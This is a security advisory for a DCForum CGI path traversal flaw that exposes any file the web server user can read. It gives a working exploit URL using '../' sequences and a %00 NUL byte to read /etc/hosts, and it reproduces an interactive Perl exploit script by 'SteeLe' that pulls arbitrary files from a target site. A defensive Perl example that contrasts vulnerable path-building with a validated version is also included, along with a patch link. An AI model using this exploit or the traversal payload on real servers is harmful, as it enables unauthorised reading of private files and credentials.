COMMAND

    DCForum

SYSTEMS AFFECTED

    DCForum, all versions from 1.0 to 6.0 (current)

PROBLEM

    The following is based on CGI Security Advisory #2.  Any file  that
    the web server user (typically nobody) can read  can be  read  over
    the  web  through  the  /dcforum/dcboard.cgi  script;  the advisory
    also reports a possible root compromise via the same script.  Command
    execution is not possible (read only).   This has only been tested
    on Unix and Linux versions;  whether  the  Windows  versions  are
    affected is unknown.

    Asking the script to display its own source causes dcboard.cgi  to
    be deleted.  The cause is unknown at the time of writing, since  the
    authors do not have the source.

    For the above reason the authors are not releasing their exploit at
    this point in time.  They would release it, but it caused too  much
    damage from simply "clicking on a link".  If it merely returned  the
    passwd file that would be one thing, but it deleted data and perhaps
    more that is not yet known of.

    SteeLe added the following.  Simple exploitation is a single request:
    the forum parameter carries the traversal, and the trailing %00 (a NUL
    byte after URL decoding) cuts off whatever extension the script appends
    to the name before opening it:

        http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../.././etc/hosts%00
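
    The following is an added illustration, not code from the advisory or
    from DCForum (whose source the advisory's authors did not have).  It
    shows the path-building pattern that produces this class of bug, what
    the kernel ends up opening once the NUL is in the string, and a
    validating replacement.  The base directory, the query decoding and
    the subroutine names are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not DCForum code: the file-read pattern behind the
# advisory and a validating replacement.  $BASE and the parameter
# handling are assumptions.
use strict;
use warnings;
use File::Spec;

my $BASE = "/usr/local/apache/cgi-bin/dcforum/forums";   # assumed location

# Minimal query-string value decoder (stands in for the CGI's own parsing).
sub decode_param {
    my ($value) = @_;
    $value =~ tr/+/ /;
    $value =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $value;
}

# Vulnerable pattern: the untrusted forum name is pasted into a path and a
# fixed extension is appended, so the script believes it can only ever
# open "<something>.cgi" under $BASE.
sub unsafe_forum_path {
    my ($forum) = @_;
    return "$BASE/$forum.cgi";
}

# What open(2) actually receives: the filename is handed to the C library
# as a NUL-terminated string, so on perls that passed the NUL through,
# everything after it, including the appended ".cgi", was discarded.
# This subroutine emulates that truncation for display; current perls
# refuse a filename containing NUL instead of passing it on.
sub as_seen_by_open {
    my ($path) = @_;
    my $nul = index($path, "\0");
    return $nul < 0 ? $path : substr($path, 0, $nul);
}

# Hardened version: accept only a short identifier, so "..", "/" and NUL
# never reach the filesystem, then canonicalise and re-check that the
# result still lies under $BASE.  Returns undef for anything rejected.
sub safe_forum_path {
    my ($forum) = @_;
    return undef unless defined $forum
        && $forum =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    my $path = File::Spec->canonpath(File::Spec->catfile($BASE, "$forum.cgi"));
    return undef unless index($path, "$BASE/") == 0;
    return $path;
}

# The traversal value from the advisory's example URL, as the CGI sees it
# after decoding.  Six "../" climb out of the six-deep $BASE, landing at /.
my $forum = decode_param("../../../../../.././etc/hosts%00");

my $built = unsafe_forum_path($forum);
printf "built:    %s\n", $built =~ s/\0/\\0/gr;    # shows the literal NUL as \0
printf "opened:   %s\n", as_seen_by_open($built);  # resolves to /etc/hosts
printf "attack:   %s\n", safe_forum_path($forum)    // "rejected";
printf "normal:   %s\n", safe_forum_path("general") // "rejected";
```

    The whitelist regex is the real fix; the containment check afterwards is
    a second line of defence in case the naming rule is ever loosened.  Note
    that a perl which refuses NUL in filenames only removes the truncation
    trick; the "../" traversal still works without it unless the script
    validates the name.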

    The code:

    #!/usr/bin/perl
    # DC Forum vulnerability (found in versions 1.0 - 6.0 according to the
    # CGISecurity.com advisory): exploits the remote file reading hole.
    # By SteeLe
    # BEGIN { open(STDERR, ">errors.txt"); }   # error checking
    use strict;
    use warnings;
    use Socket;   # inet_aton

    my $lynx = "/usr/bin/lynx";   # specify

    die "\n\t---   Usage: $0 <site> <cgi location>  ---\n" if @ARGV < 2;

    my ($site, $cgi) = @ARGV;
    # Resolve the host up front so a typo fails here rather than inside lynx.
    my $inet = inet_aton($site) or die "cannot resolve $site\n";

    print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
    print "\n\t---   By the cool fellas at *   ---\n\n";

    while (1) {   # yea i think I stole this from the pollex.pl, uh thanks.

        print "[dcforum]Option:";
        my $action = <STDIN>;
        last unless defined $action;   # EOF on stdin
        chomp($action);

        if ($action eq "r") {
            print "\nFile(to read):";
            my $file = <STDIN>;
            last unless defined $file;
            chomp($file);
            # Same request as the manual URL above: the traversal goes in
            # the forum parameter and the trailing %00 cuts off whatever
            # extension the script appends to the name.
            my $url = "?az=list&forum=$file%00";
            # -source returns the raw response instead of starting lynx
            # interactively; keep the result in its own variable so $site
            # survives for the next request.
            my $out = `$lynx -source "http://$site$cgi$url"`;
            print $out;
        }
        elsif ($action eq "q") {
            print "now exiting program\n";
            exit;
        }
        else {
            print "Valid Options: r(read files, usage r <file>), q(quit)\n";
        }
    }

SOLUTION

    The vendor has been contacted about this serious security problem.
    A patch was issued within one hour of the hole being found.

        http://www.dcscripts.com/dcforum/dcfNews/124.html